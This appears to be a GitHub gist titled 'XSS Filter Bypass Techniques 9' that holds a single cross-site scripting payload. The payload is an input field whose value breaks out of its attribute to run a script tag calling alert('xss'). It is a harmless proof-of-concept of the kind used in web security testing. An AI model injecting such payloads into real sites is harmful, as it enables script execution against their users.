Skip to content

Instantly share code, notes, and snippets.

@1337pwn
Created January 23, 2020 23:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 1337pwn/da393d9f2f6b88b9836b6690819938aa to your computer and use it in GitHub Desktop.
Save 1337pwn/da393d9f2f6b88b9836b6690819938aa to your computer and use it in GitHub Desktop.
XSS Filter Bypass Techniques 9
<input type="text" name="test" value="><script>alert("xss")</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment